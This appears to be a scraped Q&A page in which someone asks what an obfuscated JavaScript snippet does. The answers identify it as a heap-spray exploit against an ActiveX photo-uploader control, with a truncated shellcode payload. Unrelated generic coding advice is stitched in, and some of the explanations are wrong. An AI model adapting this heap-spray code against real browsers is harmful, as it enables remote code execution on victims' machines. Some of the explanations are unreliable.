I do not understand this code snippet :
function ms(){
var plc=unescape('".
unescape( '\x43\x43\x43\x43\n.............\xEF'. $URL).CollectGarbage();
if (mf)return(0);
mf=1;
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++) m[i]=ss+plc;
hav();
return(1);
}
In the above function I can't seem to figure out the variable types, or figure out what it's doing with the hsta
variable, and what it's assigning to it:
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;
I also can't figure out this function :
function fb(){
try {
var obj=null;
obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 400) buf += buf;
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
}
} catch(e){}
return 0;
}
What does the following code mean?
cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}')
What kind of variable is this?
var buf = addr(0x0c0c0c0c);
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
Most importantly, what is that code snippet trying to do?
Here are some more functions:
function hex(num,width){
var digits='0123456789ABCDEF';
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex='0'+hex;
return hex;
}
function addr(addr){
return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));
}
Any guidance would be appreciated.
You need to sit down and read, take away the things that might distract you and focus, also use a strategy like do ide and conquer, splitting the code into sections and analyze them individually, when you understand each section, try to understand how they interact, also if the code includes the tests, use them!
Originally Answered: Is it normal for me to not understand the code I wrote myself months ago? I'll answer this two ways. The first is, yes, it's totally normal. The implied question that deserves a different answer is "Is that something I should worry about?" The answer is yes.
“Coding is hard because it's different” Coding is thought to be hard because it's a different type of skill; and “different” in the sense that it's unlike anything most of us have ever experienced before.
This 4 step process is simple and will save you a lot of time and effort; all you need to do is: Run the code and explore the results. Find the main function or the start point of the code. Run the code under the debugger and fully understand the code's mechanics.
It's a javascript snippet trying to exploit a security vulnerability related to Facebook, more specifically to its image uploader client side ActiveX control.
The cobj
part tries to create an object of ClassID {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}
which happens to be an ActiveX photo uploader control. The ExtractIptc and ExtractExif functions belong to that specific ActiveX control.
The core of the code is really memory address manipulation, shifting, using masks to separate high and low bits. For example, hex((addr>>16)&0xFFFF,4))
takes an address, shifts it 16 bits to the right, clears up the lower part and converts it to a hex number. To actually understand most of this code, you should have the right debugging tools.
Googling the {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}
ClassID gave some interesting results you should look into:
http://www.kb.cert.org/vuls/id/776931
http://seclists.org/fulldisclosure/2008/Feb/0023.html
http://securitytracker.com/alerts/2008/Feb/1019297.html
Please note, this is not PHP. It's javascript.
More details...
cobj is probably translated into a CreateObject() call. Every registered ActiveX control has its own Class ID, and they have the form {0000000000-0000-0000-0000-000000000000}
. When you want to refer to the registered library, and create an instance of it, you can use either its name or its Class ID.
The ActiveX control itself should be an .OCX or .DLL file on your computer. If you can find this file and debug it, you'll get most specific details about the ExtractIptc and ExtractExif functions. Again, those two functions seem to have vulnerabilities when called in a specific way, and this is what that script is trying to exploit.
The var hsta=0x0c0c0c0c
part defines a variable hsta, equal to the hexadecimal number 0c0c0c0c. It's the same as writing var hsta = 202116108
. In computer engineering, it's easier to deal with hexadecimal addresses than decimal numbers since addresses and data inside the computer's memory is binary and can be directly represented as a hex number. More details about hexadecimal there: http://en.wikipedia.org/wiki/Hexadecimal.
The variable name hsta seems to be in hungarian notation (first letter represents the variable type - h for hex). I would therefore assume it means hexadecimal start address (hsta). Following the same train of thought, my guess would be that pl
means payload and plc
means payload code.
The payload code is the code the computer will execute if the exploit was successful, and it's what you see at the beginning of the script (\x43\x43\x43\x43\n....\xEF)
. It's encoded as shell code for a particular CPU architecture and operating system. That means code that's already compiled, standalone, and can be piped to the CPU directly. If you decode this, you'll probably find something close to machine code. It's probably nothing positive.
The hex(num,width)
function converts a decimal number to its hexadecimal form. I've tested the function separately, and it returned 3E8 when feeding it 1000. The width variable is simply used to exit the script if the resulting hexadecimal number is bigger than specified.
About this part:
var buf = addr(0x0c0c0c0c);
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
The buf variable is a buffer. A buffer is nothing more than data in memory. It can be interfaced as a string, as shown in this code. My guess is that a buffer of 400 bytes is created from whatever contents is in memory at 0x0c0c0c0c, and then fed into two functions.
There are several function definitions missing in here. Namely, the hav() function.
I fixed the formatting as much as I could, but there still seem to be chunks missing. At least, I'm seeing syntax errors, uninitialized variables, etc.
If this is actual working code please edit your question and (using the "code" button "101/010" or just indenting 4 spaces rather than quoting with the '"' button) post the actual code so that what we see matches what you are seeing. EDIT: DON'T TRY TO RUN THIS CODE! its probably malicious.
If it isn't working code, there's your answer: it doesn't work, so trying to figure out how it works doesn't make sense.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With